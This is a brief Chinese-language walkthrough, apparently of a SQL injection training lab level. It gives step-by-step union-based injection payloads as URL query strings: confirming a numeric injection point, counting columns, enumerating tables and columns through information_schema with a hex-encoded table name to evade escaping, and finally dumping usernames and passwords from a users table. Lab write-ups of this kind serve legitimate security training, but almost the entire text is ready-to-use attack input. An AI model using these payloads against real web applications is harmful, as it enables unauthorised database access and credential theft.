判断注入类型
id=2 and 1=1与id=2 and 1=2结果不同,为数字型注入
判断字段数
?id=2%20order%20by%204
得出回显点
?id=-2%20union%20select%201,2,3
得出数据库
得出表名
?id=-2%20union%20select%201,2,group_concat(table_name)%20from%20information_schema.tables%20where%20table_schema=database()
得出列名
此关还是存在宽字节,需要转义成十六进制
?id=-2%20union%20select%201,2,group_concat(column_name)%20from%20information_schema.columns%20where%20table_schema=database()%20and%20table_name=0x7573657273
用户名密码
?id=-2%20union%20select%201,group_concat(username),group_concat(password)%20from%20users